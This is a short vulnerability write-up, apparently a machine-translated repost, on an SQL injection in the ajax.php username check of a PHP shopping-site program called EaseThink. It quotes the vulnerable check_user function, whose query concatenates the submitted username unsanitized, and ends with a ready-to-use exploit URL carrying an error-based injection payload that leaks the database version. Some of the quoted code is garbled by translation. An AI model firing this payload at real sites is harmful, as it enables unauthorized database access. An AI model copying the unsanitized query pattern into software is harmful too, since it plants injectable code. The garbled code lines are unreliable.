Easy to buy ajax. php SQL Injection Analysis and Exp

When registering, the user name is entered in the background to verify whether the user name exists, of course, through ajaxVerify thatAjax. php. Many programs ignore this and cause it to exist.SQLInjection.
 

* Verify Member Data

        */

        function check_user($field_name,$field_data)

        {

// Start data verification

                 $user_data[$field_name] = $field_data;

$ Res = array ('status' => 1, 'info' => '', 'data' =>''); // used to return data

                 if(trim($user_data['user_name'])==''&&$field_name=='user_name')

                 {

                         $field_item['field_name'] = 'user_name';

                         $field_item['error']      =        EMPTY_ERROR;

                         $res['status'] = 0;

                         $res['data'] = $field_item;

                         return $res;

                 }

If ($ field_name = 'user _ name' & $ GLOBALS ['db']-> getOne ("select count (*) from ". DB_PREFIX. "user where user_name = '". trim ($ user_data ['user _ name']). "'and id <> ". intval ($ user_data ['id'])> 0) // the value of $ user_data ['user _ name'] Here is the value submitted by the user name, here, only spaces are filtered. All SQL Injection Vulnerabilities exist.

                 {

                         $field_item['field_name'] = 'user_name';

                         $field_item['error']      =        EXIST_ERROR;

                         $res['status'] = 0;

                         $res['data'] = $field_item;

                         return $res;

                 }

 



Exp:
 

http:// www.2cto.com /easethink_free_v1.4/ajax.php?act=check_field&field_name=user_name&field_data='and/**/(select/**/1/**/from/**/(select/**/count(*),concat(version(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23